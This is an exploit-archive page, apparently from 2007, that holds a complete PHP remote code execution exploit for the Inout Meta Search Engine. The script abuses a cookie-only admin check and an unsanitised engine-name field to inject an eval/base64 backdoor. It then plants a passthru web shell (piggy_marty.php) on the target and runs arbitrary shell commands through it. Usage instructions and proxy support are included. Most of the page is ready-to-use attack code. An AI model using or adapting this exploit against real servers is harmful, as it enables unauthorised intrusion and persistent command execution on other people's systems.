Inout Meta Searh engine Remote Code Execution

2007.06.05
Credit: BlackHawk
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php -q -d short_open_tag=on <? echo " Inout Search Engine (all version) Remote Code Execution Exploit by BlackHawk <hawkgotyou (at) gmail (dot) com [email concealed]> <http://itablackhawk.altervista.org> Thanks to rgod for the php code and Marty for the Love "; if ($argc<3) { echo "Usage: php ".$argv[0]." Host Path cmd Host: target server (ip/hostname) Path: path of inoutsearchengine cmd: a Shell command Example: php ".$argv[0]." localhost /inoutsearchengine/ dir"; die; } /* Vuln Explanation: Take a look on one of the admin files, the begin should be something like this: <?php include("config.inc.php"); if(!isset($_COOKIE['admin'])) { header("Location:index.php"); } ?> this is not a protection for two reasons: i) everyone can make a cookie with false credentials ii) there isn't any exit or die function after header('Location: index.php') Now look at create engine.php, and you find that there isn't any parse of the text you send as the engine name.. Besides that the names of the tabs are written into a PHP files to make faster the loading process.. the only limit we have while we inject the code is taht we can't put spaces in the code, otherwise php will end with an error.. */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $cmd=""; for ($i=3; $i<=$argc-1; $i++){ $cmd.=" ".$argv[$i]; } $cmd=urlencode($cmd); $port=80; $proxy=""; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "- Injecting Shell Creator..\r\n"; /* It was too simple to inject directly the shell into the file.. Let's make the process longer :P */ $data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+E ngine+%21+&spl=term"; $packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "- refreshing data file..\r\n"; $packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; echo "- Creating the real Shell..\r\n"; /* Costumize it as you want.. */ $my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\'); fputs($fp,\'<?php error_reporting(0); set_time_limit(0); if (get_magic_quotes_gpc()) { $_GET[cmd]=stripslashes($_GET[cmd]); } echo 666999; passthru($_GET[cmd]); echo 666999; ?>\'); fclose($fp); chmod(\'piggy_marty.php\',777);'); $data="shell=$my_shell"; $packet="POST ".$p."index.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."index.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "StepX - Executing Shell..\r\n"; $packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=$cmd\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"666999")) { echo "Exploit succeeded...\r\n"; $temp=explode("666999",$html); die("\r\n".$temp[1]."\r\n"); } # Coded With BH Fast Generator v0.1 ?> -- Best regards, BlackHawk mailto:hawkgotyou (at) gmail (dot) com [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top